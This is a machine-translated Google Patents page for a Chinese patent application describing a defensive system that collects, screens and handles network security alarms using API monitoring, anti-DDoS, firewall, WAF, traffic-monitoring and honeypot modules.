CN117614717A - Whole-flow handling system and method based on network security alarm event - Google Patents
Whole-flow handling system and method based on network security alarm event Download PDFInfo
- Publication number
- CN117614717A CN117614717A CN202311632947.XA CN202311632947A CN117614717A CN 117614717 A CN117614717 A CN 117614717A CN 202311632947 A CN202311632947 A CN 202311632947A CN 117614717 A CN117614717 A CN 117614717A
- Authority
- CN
- China
- Prior art keywords
- unit
- monitoring
- responsible
- flow
- attack
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
- 238000000034 method Methods 0.000 title claims description 28
- 238000012544 monitoring process Methods 0.000 claims abstract description 116
- 238000004458 analytical method Methods 0.000 claims abstract description 36
- 239000008186 active pharmaceutical agent Substances 0.000 claims description 40
- 238000001914 filtration Methods 0.000 claims description 27
- 230000006399 behavior Effects 0.000 claims description 24
- 206010000117 Abnormal behaviour Diseases 0.000 claims description 14
- 230000000694 effects Effects 0.000 claims description 14
- 230000008569 process Effects 0.000 claims description 14
- 238000005206 flow analysis Methods 0.000 claims description 12
- 230000004044 response Effects 0.000 claims description 10
- 238000004140 cleaning Methods 0.000 claims description 8
- 238000001514 detection method Methods 0.000 claims description 7
- 238000004088 simulation Methods 0.000 claims description 6
- 238000004891 communication Methods 0.000 claims description 5
- 238000007405 data analysis Methods 0.000 claims description 5
- 230000002159 abnormal effect Effects 0.000 claims description 4
- 230000007123 defense Effects 0.000 claims description 4
- 238000012216 screening Methods 0.000 claims description 4
- 238000012795 verification Methods 0.000 claims description 4
- 230000000007 visual effect Effects 0.000 claims description 4
- 241001522296 Erithacus rubecula Species 0.000 claims description 3
- 230000003044 adaptive effect Effects 0.000 claims description 3
- 230000005540 biological transmission Effects 0.000 claims description 3
- 125000004122 cyclic group Chemical group 0.000 claims description 3
- 238000009826 distribution Methods 0.000 claims description 3
- 235000012907 honey Nutrition 0.000 claims description 3
- 238000002347 injection Methods 0.000 claims description 3
- 239000007924 injection Substances 0.000 claims description 3
- 238000005457 optimization Methods 0.000 claims description 3
- 238000011084 recovery Methods 0.000 claims description 3
- 230000004931 aggregating effect Effects 0.000 claims description 2
- 238000013475 authorization Methods 0.000 claims description 2
- 238000013480 data collection Methods 0.000 claims description 2
- 238000010025 steaming Methods 0.000 claims description 2
- 230000005641 tunneling Effects 0.000 claims description 2
- 238000005111 flow chemistry technique Methods 0.000 abstract description 3
- 238000010586 diagram Methods 0.000 description 7
- 238000005516 engineering process Methods 0.000 description 6
- 238000007726 management method Methods 0.000 description 4
- 238000012545 processing Methods 0.000 description 3
- 230000009467 reduction Effects 0.000 description 3
- 238000012550 audit Methods 0.000 description 2
- 230000000903 blocking effect Effects 0.000 description 2
- 230000008859 change Effects 0.000 description 2
- 238000011161 development Methods 0.000 description 2
- 239000000243 solution Substances 0.000 description 2
- 238000005406 washing Methods 0.000 description 2
- 230000009286 beneficial effect Effects 0.000 description 1
- 238000013079 data visualisation Methods 0.000 description 1
- 230000003111 delayed effect Effects 0.000 description 1
- ZXQYGBMAQZUVMI-GCMPRSNUSA-N gamma-cyhalothrin Chemical compound CC1(C)[C@@H](\C=C(/Cl)C(F)(F)F)[C@H]1C(=O)O[C@H](C#N)C1=CC=CC(OC=2C=CC=CC=2)=C1 ZXQYGBMAQZUVMI-GCMPRSNUSA-N 0.000 description 1
- 230000005855 radiation Effects 0.000 description 1
- 238000006467 substitution reaction Methods 0.000 description 1
- 238000012360 testing method Methods 0.000 description 1
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1458—Denial of Service
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L41/00—Arrangements for maintenance, administration or management of data switching networks, e.g. of packet switching networks
- H04L41/06—Management of faults, events, alarms or notifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/02—Network architectures or network communication protocols for network security for separating internal from external traffic, e.g. firewalls
- H04L63/0227—Filtering policies
- H04L63/0236—Filtering by address, protocol, port number or service, e.g. IP-address or URL
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/02—Network architectures or network communication protocols for network security for separating internal from external traffic, e.g. firewalls
- H04L63/0227—Filtering policies
- H04L63/0245—Filtering by information in the payload
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1425—Traffic logging, e.g. anomaly detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1433—Vulnerability analysis
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1491—Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L9/00—Cryptographic mechanisms or cryptographic arrangements for secret or secure communications; Network security protocols
- H04L9/40—Network security protocols
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
- Computer And Data Communications (AREA)
Abstract
The invention discloses a full-flow processing system based on network security alarm events, which comprises an Api monitoring module, an anti-DDOS module, a firewall module, a WAF module, a flow monitoring module and a honeypot module, wherein the Api monitoring module is configured to realize interface availability monitoring, performance monitoring, security monitoring, error monitoring, business logic monitoring and log recording and reporting; the DDOS resistant module is configured to identify, filter, clean and monitor the flow entering the system in real time; the firewall module is configured to filter and block packets that do not conform to rules and to examine and filter data above the transport layer; the WAF module is configured to be responsible for monitoring and analyzing the flow of the Web application program in real time; the flow monitoring module is configured to acquire data packets from a network and conduct flow behavior analysis; the honeypot module is configured to simulate vulnerabilities and configuration problems of a real system or application program, and to entice an attacker to enter the honeypot system.
Description
Technical Field
The invention relates to the technical field of network alarms, in particular to a system and a method for processing a whole flow based on a network security alarm event.
Background
With the development of technology, the association of network space and physical space is becoming more and more intimate, the boundary is becoming blurred, the radiation range of network attack is rapidly extended, and the international network situation is becoming tense. Network security countermeasures gradually present a trend in war. The network safety work background is complex, the related range is wide, the fierce resistance is realized, and the society engineering, the novel non-killing Trojan horse, the 0day weapon and the like become normalcy. To address these issues, more efficient measures and strategies need to be taken to protect network security and the security of critical infrastructure.
Because alarm monitoring, analysis, disposal and tracing are all responsible for different professional teams, the prior art adopts the electronic form situation to register, change and circulate the network security alarm event, the file data collection, change and share are difficult, the inconsistent data versions obtained by related parties are easy to cause, the responsibilities are unclear, the alarm event is omitted to be processed, or the alarm event is not updated timely, the disposal of the alarm event is delayed, particularly the influence is large when the important exercise or activities are performed, the network security alarm event is timely disposed for high-efficiency network security attack, the orderly development of the disposal of the alarm event is ensured, and a network security alarm event disposal system is required to be developed to improve the management efficiency of the network security alarm event.
Disclosure of Invention
The present invention is directed to a system and a method for processing a whole flow based on a network security alarm event, and aims to solve the above technical problems in the background art.
In order to achieve the above object, the technical solution of the embodiment of the present invention is as follows: the invention discloses a full-flow processing system based on network security alarm events, which comprises an Api monitoring module, a DDOS (distributed denial of service) resisting module, a firewall module, a WAF (WAF) module, a flow monitoring module and a honeypot module, wherein the Api monitoring module is configured to realize interface availability monitoring, performance monitoring, security monitoring, error monitoring, business logic monitoring and log recording and reporting;
the DDOS resistant module is configured to identify, filter, clean, monitor and analyze traffic entering the system in real time, and is responsible for equally distributing traffic among a plurality of servers, and carrying out identity verification and authorization on users;
the firewall module is configured to filter and block packets that do not conform to rules and to examine and filter data above the transport layer;
the WAF module is configured to be responsible for monitoring and analyzing the flow of the Web application program in real time;
the flow monitoring module is configured to acquire data packets from a network and conduct flow behavior analysis;
the honeypot module is configured to simulate loopholes and configuration problems of a real system or an application program, induce an attacker to enter the honeypot system, and then acquire and analyze information of the attack behaviors.
Optionally, the Api monitoring module includes an interface availability monitoring unit, a performance monitoring unit, a security monitoring unit, an error monitoring unit, a business logic monitoring unit and a first log recording unit,
the interface availability monitoring unit is configured to be responsible for periodically checking the availability of the API interface and verifying returned indexes such as state codes, response time and the like;
the performance monitoring unit is configured to be responsible for measuring performance indexes of the API, and simulating and sending requests under different loads so as to evaluate performance bottlenecks and optimization requirements of the API;
the security monitoring unit is configured to be responsible for detecting the security of the API, monitoring malicious behaviors, abnormal requests and potential security vulnerabilities, and providing real-time alarms and logging;
the error monitoring unit is configured to be responsible for monitoring error codes and error messages returned by the API, and checking the error messages in the response of the API so as to discover and process error conditions in time;
the business logic monitoring unit is configured to be responsible for verifying whether the business logic of the API is correct or not, and checking whether the behavior and the result of the API under various input conditions meet the expectations or not;
the first log recording unit is configured to collect, record and analyze API monitored data, generate reports and visual charts, and display the use condition, performance index and fault condition information of the API.
Optionally, the DDOS resistant module comprises a first flow analysis unit, a flow cleaning unit, a load balancing unit, a first security authentication unit, a defense protocol unit and a second log recording unit,
the first flow analysis unit is configured to be responsible for monitoring and analyzing the flow entering the system in real time, and identifying and recording various types of flow;
the flow cleaning unit is configured to be responsible for filtering and cleaning the flow entering the system, and filtering malicious flow and attack flow from the flow;
the load balancing unit is configured to be responsible for balancing and distributing the flow among a plurality of servers, and dynamically adjusts according to the performance and the load condition of the servers so as to realize fairness of flow distribution;
the first security authentication unit is configured to be responsible for authenticating and authorizing a user to prevent unauthorized access and attack;
the defending protocol unit is configured to be responsible for identifying and preventing various DDOS attack protocols, and detecting and defending attack traffic;
the second logging unit is configured to be responsible for collecting, logging and analyzing DDOS-resistant data.
Optionally, the firewall module comprises a filtering unit, an application layer proxy unit, a state tracking unit, a VPN unit, an IDS/IPS unit and a third log recording unit,
the packet filtering unit is configured to be responsible for checking network data packets and filtering and preventing data packets which do not accord with rules according to a predefined rule set;
the application layer proxy unit is configured to be responsible for checking and filtering data above a transmission layer, and checking and filtering the transmitted data;
the state tracking unit is configured to be responsible for tracking the state of network connection, filtering and authenticating according to the state, and detecting and preventing unauthorized connection, malicious activity and abnormal behavior;
the VPN unit is configured to be used for establishing and managing secure remote connection, and encrypting and tunneling data by adopting an encryption algorithm;
the IDS/IPS unit is configured to be responsible for detecting and defending intrusion activities, monitoring network traffic and system logs, identifying abnormal behaviors and malicious attacks, and triggering alarms or taking automatic defending measures;
the third logging unit is configured to be responsible for collecting, logging and analyzing firewall data.
Optionally, the WAF module includes a second traffic analysis unit, a rule engine unit, a white list/black list unit, a second security authentication unit, a file uploading/downloading unit, an abnormal behavior detection unit, an API protection unit, and a fourth logging unit,
the second flow analysis unit is configured to be responsible for monitoring and analyzing the flow of the Web application program in real time and analyzing at least parameters, header information and load characteristics in the request;
the rule engine unit is configured to be responsible for checking request and response data according to a predefined rule set, and at least identifying and filtering malicious requests, SQL injection, cross-site scripting attack and file inclusion attack;
the white list/black list unit is configured to be responsible for managing a list which allows or forbids specific IP addresses, users, URL or HTTP methods to access Web application programs;
the second security authentication unit is configured to be responsible for authenticating and authorizing a user to prevent unauthorized access and attack;
the file uploading/downloading unit is configured to be responsible for checking and controlling the safety of file uploading and downloading, detecting the type and the size of the uploaded file and preventing the uploading and the downloading of malicious files;
the abnormal behavior detection unit is configured to detect and prevent malicious behaviors of an attacker;
the API protection unit is configured to be responsible for protecting the API from malicious behaviors and attacks;
the fourth logging unit is configured to be responsible for collecting, recording and analyzing data of the WAF.
Optionally, the flow monitoring module comprises a data acquisition unit, a third flow analysis unit, a flow statistics unit, an alarm and alert unit, a flow reconstruction unit, a protocol identification unit, a network topology graph unit and a fifth log recording unit,
the data acquisition unit is configured to be responsible for acquiring a data packet from a network and converting the data packet into an analyzable format;
the third flow analysis unit is configured to be responsible for monitoring and analyzing the data packet in real time;
the traffic statistics unit is configured to be responsible for counting and analyzing network traffic, and classifying and aggregating the traffic at least according to time, direction and protocol dimension;
the alarm and alert unit is configured to be responsible for detecting and triggering alarms and alerts;
the flow reconstruction unit is configured to reconstruct and optimize normal network flow so as to reduce the attack effect of an attacker;
the protocol identification unit is configured to perform protocol identification on traffic in network communication;
the network topology map is configured to map and manage physical and logical topology maps of a network;
the fifth logging unit is configured for collecting, recording and analyzing data of traffic monitoring.
Optionally, the honeypot module comprises a virtual machine environment unit, a service simulation unit, a threat information unit, a data analysis and alarm unit, an attack reduction and analysis unit, an adaptive honeypot unit and a crossing honeypot unit,
the virtual machine environment unit is configured to be responsible for creating a virtual machine environment and deploying honeypots therein;
the service simulation unit is configured to be responsible for simulating various network services and deploying forged services in the honeypot so as to attract an attacker to attack;
the threat information unit is configured to be responsible for acquiring and analyzing threat information and updating an attack characteristic library in the honeypot to identify and prevent attacks;
the data analysis and alarm unit is configured to be responsible for monitoring and analyzing data in the honeypot in real time, and recording and reporting an attack behavior when an attacker tries to access the honeypot;
the attack recovery and analysis unit is configured to be responsible for recovering an attack process and analyzing an attack means, and records data traffic and command execution information in the attack process;
the self-adaptive honeypot unit is configured to simulate loopholes and configuration problems of a real system or an application program, and is used for trapping an attacker into the honeypot system and monitoring and analyzing the attack behaviors;
the spanned honey pot unit is configured for trapping and monitoring the activity of an attacker.
The second aspect of the invention discloses a network security alarm event based full flow treatment method, which is applied to a treatment system as claimed in any one of the preceding claims, and comprises the following steps:
carrying out round robin on security monitoring equipment including WAF, DDOS-resistant equipment, firewall and flow monitoring equipment to obtain security alarm information;
screening out high-risk attack alarm information in the safety alarm information, performing secondary steaming and analysis on the high-risk attack alarm information, and judging whether the information is true or not;
when the high-risk attack alarm information is true, the cyclic grabbing state is an attack source to be blocked, the operation of a simulator is blocked on the boundary firewall and the DDOS-resistant equipment, and the attack IP is blocked;
and generating and archiving a problem work order according to the safety alarm information.
The invention has the beneficial effects that: 1. the automatic wheel patrol is used for grabbing the alarm information of the safety equipment, automatically extracting high-risk alarms and automatically blocking and disabling the high-risk attack source IP, so that the workload of network safety professional monitoring, analysis and disposal personnel is greatly reduced, and the reduction of more than 50% of the workload and the reduction of more than 60% of the working strength of the professional monitoring, analysis and disposal personnel are realized;
2. the network security alarm event handling standardization and digitization are realized, management and control are carried out according to the whole flow of five links including alarm discovery, alarm registration, alarm analysis, alarm handling, alarm attack source tracing, rapid positioning and alarm event handling condition changing are realized, communication cost is greatly reduced, the timely handling rate of high-risk network security alarm events is more than 98%, and meanwhile, the problem management and control time rate is more than 98%.
Drawings
FIG. 1 is an overall block diagram of a system in an embodiment of the present application;
FIG. 2 is an overall block diagram of an Api monitoring module in an embodiment of the present application;
FIG. 3 is an overall block diagram of a DDOS resistant module in an embodiment of the present application;
FIG. 4 is an overall block diagram of a firewall module according to an embodiment of the disclosure;
fig. 5 is an overall block diagram of a WAF module in an embodiment of the disclosure;
FIG. 6 is an overall block diagram of a traffic monitoring module in an embodiment of the present application;
fig. 7 is an overall block diagram of a honeypot module in an embodiment of the application.
Reference numerals illustrate: 1Api monitoring module, 101 interface availability monitoring unit, 102 performance monitoring unit, 103 security monitoring unit, 104 error monitoring unit, 105 business logic monitoring unit, 106 first log recording unit, 2 anti-DDOS module, 201 first traffic analysis unit, 202 traffic cleaning unit, 203 load balancing unit, 204 first security authentication unit, 205 defense protocol unit, 206 second log recording unit, 3 firewall module, 301 filtering unit, 302 application layer proxy unit, 303 state tracking unit, 304VPN unit, 305IDS/IPS unit, 306 third log recording unit, 4WAF module, 401 second traffic analysis unit, 402 rule engine unit, 403 white list/black list unit, 404 second security authentication unit, 405 file upload/download unit, 406 abnormal behavior detection unit, 407Api protection unit, 408 fourth log recording unit, 5 traffic monitoring module, 501 data acquisition unit, 502 third traffic analysis unit, 503 traffic statistics unit, 504 alarm and alert unit, 505 traffic reconstruction unit, 506 identification unit, 507 network topology map unit, 508 fifth traffic map unit, 6 virtual tank service profile unit, 606, 602, and profile analysis unit, 602 service profile analysis unit, 602, and challenge service profile analysis unit, 602 service profile analysis unit, and profile analysis unit.
Detailed Description
The technical scheme of the invention is further elaborated below by referring to the drawings in the specification and the specific embodiments. Unless defined otherwise, all technical and scientific terms used herein have the same meaning as commonly understood by one of ordinary skill in the art to which this invention belongs. The terminology used herein in the description of the invention is for the purpose of describing particular embodiments only and is not intended to be limiting of the invention. In the following description, reference is made to the expression "some embodiments" which describe a subset of all possible embodiments, but it should be understood that "some embodiments" may be the same subset or a different subset of all possible embodiments and may be combined with each other without conflict.
In the following description, numerous specific details are set forth in order to provide a more thorough understanding of the present invention. It will be apparent, however, to one skilled in the art that the invention may be practiced without one or more of these details. In other instances, well-known features have not been described in detail in order to avoid obscuring the invention.
It should be understood that the present invention may be embodied in various forms and should not be construed as limited to the embodiments set forth herein. Rather, these embodiments are provided so that this disclosure will be thorough and complete, and will fully convey the scope of the invention to those skilled in the art. And the terminology used herein is for the purpose of describing particular embodiments only and is not intended to be limiting of the invention. As used herein, the singular forms "a", "an" and "the" are intended to include the plural forms as well, unless the context clearly indicates otherwise. It will be further understood that the terms "comprises" and/or "comprising," when used in this specification, specify the presence of stated features, integers, steps, operations, elements, and/or components, but do not preclude the presence or addition of one or more other features, integers, steps, operations, elements, components, and/or groups thereof. As used herein, the term "and/or" includes any and all combinations of the associated listed items.
It will be further understood that when an element is referred to as being "fixed to" another element, it can be directly on the other element or intervening elements may also be present. When an element is referred to as being "connected" to another element, it can be directly connected to the other element or intervening elements may also be present. The terms "vertical," "horizontal," "inner," "outer," "left," "right," and the like are used herein for illustrative purposes only and are not meant to be the only embodiment.
In order to provide a thorough understanding of the present invention, detailed structures will be presented in the following description in order to illustrate the technical solutions presented by the present invention. Alternative embodiments of the invention are described in detail below, however, the invention may have other implementations in addition to these detailed descriptions.
Referring to fig. 1, the first aspect of the present invention discloses a network security alarm event based full flow handling system, the system comprising an Api monitoring module 1, an anti-DDOS module 2, a firewall module 3, a WAF module 4, a traffic monitoring module 5 and a honeypot module 6, the Api monitoring module 1 being configured to implement interface availability monitoring, performance monitoring, security monitoring, error monitoring, business logic monitoring and logging and reporting;
the DDOS-resistant module 2 is configured to identify, filter, clean, monitor, analyze and take charge of distributing traffic equally among a plurality of servers, and authenticate and authorize users;
the firewall module 3 is configured to filter and block packets that do not conform to rules and to examine and filter data above the transport layer;
the WAF module 4 is configured to be responsible for monitoring and analyzing the flow of the Web application program in real time;
the flow monitoring module 5 is configured to acquire a data packet from a network and perform flow behavior analysis;
the honeypot module 6 is configured to simulate vulnerabilities and configuration problems of a real system or application program, induce an attacker to enter the honeypot system, and then acquire and analyze information of the attack.
Specifically, the Api monitoring module 1 includes an interface availability monitoring unit 101, a performance monitoring unit 102, a security monitoring unit, an error monitoring unit 104, a business logic monitoring unit 105 and a first log recording unit 106,
the interface availability monitoring unit 101 is configured to be responsible for periodically checking the availability of the API interface, and sending a request to the API endpoint, and verifying the returned status code, response time, and other indexes to ensure the normal operation of the API;
the performance monitoring unit 102 is configured to be responsible for measuring performance indexes of the API, such as response time, throughput, delay, etc., and simulate and send requests under different loads to evaluate performance bottlenecks and optimization requirements of the API;
the security monitoring unit monitors malicious behaviors, abnormal requests and potential security vulnerabilities and provides real-time alarms and log records;
the error monitoring unit 104 is configured to monitor error codes and error messages returned by the API, and check error messages in the API response so as to discover and process error conditions in time;
the service logic monitoring unit 105 is configured to be responsible for verifying whether the service logic of the API is correct, and executing a predefined test case to check whether the behavior and result of the API under various input conditions meet expectations;
the first log recording unit 106 is configured to collect, record and analyze data monitored by the API, generate reports and visual charts, and display usage, performance indexes and fault condition information of the API.
Specifically, the DDOS-resistant module 2 includes a first traffic analysis unit 201, a traffic cleaning unit 202, a load balancing unit 203, a first security authentication unit 204, a defense protocol unit 205 and a second logging unit 206,
the first flow analysis unit 201 is configured to be responsible for monitoring and analyzing the flow entering the system in real time, and identifying and recording various types of flows, such as normal flow, abnormal flow, attack flow, and the like;
the traffic washing unit 202 is configured to be responsible for filtering and washing traffic entering the system, filtering malicious traffic and attack traffic from the traffic, and filtering malicious traffic and attack traffic from the traffic by using various technologies, such as a blacklist, a whitelist, a rule engine, etc.;
the load balancing unit 203 is configured to be responsible for balancing and distributing traffic among a plurality of servers, and dynamically adjusts according to the performance and load conditions of the servers so as to realize fairness of traffic distribution;
the first security authentication unit 204 is configured to be responsible for authenticating and authorizing a user to prevent unauthorized access and attack, and may use various techniques such as two-factor authentication, IP restriction, verification codes, etc., to authenticate the user prior to access;
the defending protocol unit 205 is configured to be responsible for identifying and preventing various DDOS attack protocols, and detect and defend attack traffic, and may use various technologies, such as TCP SYN Flood, UDP Flood, HTTP Flood, and the like;
the second logging unit 206 is configured to collect, record and analyze DDOS-resistant data, and generate reports and visual charts showing DDOS-resistant capability, attack situation and processing effect of the system.
Specifically, the firewall module 3 includes a filtering unit 301, an application layer proxy unit 302, a state tracking unit 303, a VPN unit 304, an IDS/IPS unit 305 and a third logging unit 306,
the packet filtering unit 301 is configured to be responsible for checking network packets and filtering and blocking packets not conforming to rules according to a predefined rule set, and may filter according to information such as source IP address, destination IP address, port number, etc.;
the application layer proxy unit 302 is configured to be responsible for checking and filtering data above the transmission layer, and it parses application layer protocols, such as HTTP, FTP, SMTP, etc., and checks and filters the transmitted data;
the state tracking unit 303 is configured to be responsible for tracking the state of network connection, and perform filtering and authentication according to the state, so as to detect and prevent unauthorized connection, malicious activity and abnormal behavior;
the VPN unit 304 is configured to be responsible for establishing and managing a secure remote connection, and encrypts and tunnels data using encryption technology to secure communications of users over a public network;
the IDS/IPS unit 305 is configured to be responsible for detecting and defending intrusion activity, monitoring network traffic and system logs, identifying abnormal behavior and malicious attacks, and triggering alarms or taking automatic defensive measures;
the third logging unit 306 is configured to collect, record and analyze firewall data, and generate logs and reports showing network traffic, security events, audit information, etc., to assist administrators in security analysis and decision making.
Specifically, the WAF module 4 includes a second traffic analysis unit 401, a rule engine unit 402, a whitelist/blacklist unit 403, a second security authentication unit 404, a file upload/download unit 405, an abnormal behavior detection unit 406, an API protection unit 407, and a fourth logging unit 408,
the second flow analysis unit 401 is configured to be responsible for monitoring and analyzing the flow of the Web application program in real time, and records various types of flows, such as GET requests, POST requests, file uploading, and the like, and analyzes the characteristics of parameters, header information, load, and the like in the requests;
the rule engine unit 402 is configured to be responsible for checking request and response data according to a predefined rule set, which may identify and filter common Web attacks such as malicious requests, SQL injection, cross-site scripting attacks, file inclusion attacks, etc.;
the whitelist/blacklist unit 403 is configured to be responsible for managing the list that allows or prohibits access to Web applications by specific IP addresses, users, URLs or HTTP methods, and it may be automatically updated according to predefined policies to ensure that the applications are always protected;
the second security authentication unit 404 is configured to be responsible for authenticating and authorizing the user to prevent unauthorized access and attack, and it may use various technologies such as two-factor authentication, IP restriction, verification code, etc., to authenticate the user before access;
the file uploading/downloading unit 405 is configured to be responsible for checking and controlling the security of file uploading and downloading, detecting the type and size of the uploaded file, and preventing the uploading and downloading of malicious files;
the abnormal behavior detection unit 406 is configured to detect and prevent malicious behaviors of an attacker;
the API protection unit 407 is configured to be responsible for protecting the API from malicious behaviour and attacks;
the fourth logging unit 408 is configured to be responsible for collecting, recording and analyzing WAF data, and it generates logs and reports, presents security events, attack details, audit information, etc. of the Web application, and helps the administrator make security analyses and decisions.
Specifically, the flow monitoring module 5 includes a data acquisition unit 501, a third flow analysis unit 502, a flow statistics unit 503, an alarm and alert unit 504, a flow reconstruction unit 505, a protocol identification unit 506, a network topology map unit 507 and a fifth logging unit 508,
the data acquisition unit 501 is configured to be responsible for acquiring data packets from a network and converting them into an analyzable format, and may use various techniques such as network sniffing, port mirroring, SPAN, etc. to collect the data packets;
the third flow analysis unit 502 is configured to be responsible for real-time monitoring and analysis of the data packet, and records various types of flows, such as TCP, UDP, ICMP, and analyzes information of a source IP address, a destination IP address, a port number, a protocol, and the like in the packet;
the traffic statistics unit 503 is configured to be responsible for counting and analyzing network traffic, and can classify and aggregate traffic according to time, direction, protocol and other dimensions, and generate data visualization tools such as charts, reports and the like;
the alarm and alert unit 504, configured to be responsible for detecting and triggering alarms and alerts, may check abnormal behavior in traffic, such as DDoS attacks, malware propagation, etc., according to a predefined set of rules, and trigger alarms and alerts;
the traffic reconstruction unit 505 is configured to reconstruct and optimize normal network traffic to reduce the attack effect of an attacker;
the protocol identification unit 506 is configured to perform protocol identification on traffic in network communication;
the network topology map unit 507 is configured to map and manage physical and logical topologies of a network;
the fifth logging unit 508 is configured for collecting, recording and analyzing data of traffic monitoring.
Specifically, the honeypot module 6 includes a virtual machine environment unit 601, a service simulation unit 602, a threat intelligence unit 603, a data analysis and alarm unit 604, an attack-reduction-and-analysis unit 605, an adaptive honeypot unit 606 and a crossover honeypot unit 607,
the virtual machine environment unit 601 is configured to be responsible for simulating various network services, such as a Web server, an FTP server, an SMTP server, etc., which may deploy counterfeit services in the honeypot to attract an attacker to attack;
the service simulation unit 602 is configured to be responsible for simulating various network services, such as a Web server, an FTP server, an SMTP server, etc., which will deploy counterfeit services in the honeypot to attract an attacker to attack;
the threat intelligence unit 603 is configured to be responsible for acquiring and analyzing threat intelligence, such as hacker IP addresses, exploit tools, etc., which updates an attack signature library in the honeypot to identify and prevent attacks;
the data dividing and alarming unit 604 is configured to be responsible for real-time monitoring and analysis of data in the honeypot, and can detect and trigger an alarm, and when an attacker tries to access the honeypot, the attacker can record and report the attack behavior;
the attack recovery and analysis unit 605 is configured to be responsible for recovering an attack process and analyzing an attack means, and can record information such as data traffic, command execution and the like in the attack process and generate an analysis report to help an administrator to know the attack means and technology;
the self-adaptive honeypot unit 606 is configured to be used for trapping an attacker into the honeypot system, monitoring and analyzing the attack behavior so as to discover and cope with the threat in time, and has the main functions of simulating the loopholes and configuration problems of a real system or an application program, attracting the attacker into the honeypot system, and then acquiring and analyzing the information of the attack behavior;
the spanned honey pot unit 607 is configured for trapping and monitoring the activity of an attacker.
The second aspect of the invention discloses a network security alarm event based full flow treatment method, which is applied to a treatment system as claimed in any one of the preceding claims, and comprises the following steps:
s1, carrying out round robin on security monitoring equipment including WAF, DDOS-resistant equipment, a firewall and flow monitoring equipment, and acquiring security alarm information;
s2, screening out high-risk attack alarm information in the security alarm information, performing secondary retort identification and analysis on the high-risk attack alarm information, and judging whether the information is true or not;
s3, when the high-risk attack alarm information is true, the cyclic grabbing state is an attack source to be blocked, the operation of a simulator is blocked on the boundary firewall and the DDOS resistant equipment, and the attack IP is blocked;
s4, generating and archiving a problem work order according to the safety alarm information.
The method for screening the high-risk attack alarm information in the safety alarm information specifically comprises the following steps: network security alarms are automatically registered in the system, security equipment management alarm detailed pages such as WAFs, honeypots and firewalls are refreshed every 5 minutes, information such as alarm details, attack source IP, attack target IP, attack time and attack modes in the page alarm detail pages is grabbed, the alarm detail information in the page alarm detail pages is stored in preset parameters, and a new alarm event and parameter value are automatically filled into an alarm event whole-flow processing system by system simulator operation.
The foregoing is merely illustrative embodiments of the present invention, but the scope of the present invention is not limited thereto, and any person skilled in the art can easily think about variations or substitutions within the technical scope of the present invention, and the invention should be covered. The scope of the invention is to be determined by the appended claims.
Claims (8)
1. A network security alarm event-based whole-flow handling system, the system comprising an Api monitoring module, an anti-DDOS module, a firewall module, a WAF module, a flow monitoring module and a honeypot module, characterized in that the Api monitoring module is configured to implement interface availability monitoring, performance monitoring, security monitoring, error monitoring, business logic monitoring and logging and reporting;
the DDOS resistant module is configured to identify, filter, clean, monitor and analyze traffic entering the system in real time, and is responsible for equally distributing traffic among a plurality of servers, and carrying out identity verification and authorization on users;
the firewall module is configured to filter and block packets that do not conform to rules and to examine and filter data above the transport layer;
the WAF module is configured to be responsible for monitoring and analyzing the flow of the Web application program in real time;
the flow monitoring module is configured to acquire data packets from a network and conduct flow behavior analysis;
the honeypot module is configured to simulate loopholes and configuration problems of a real system or an application program, induce an attacker to enter the honeypot system, and then acquire and analyze information of the attack behaviors.
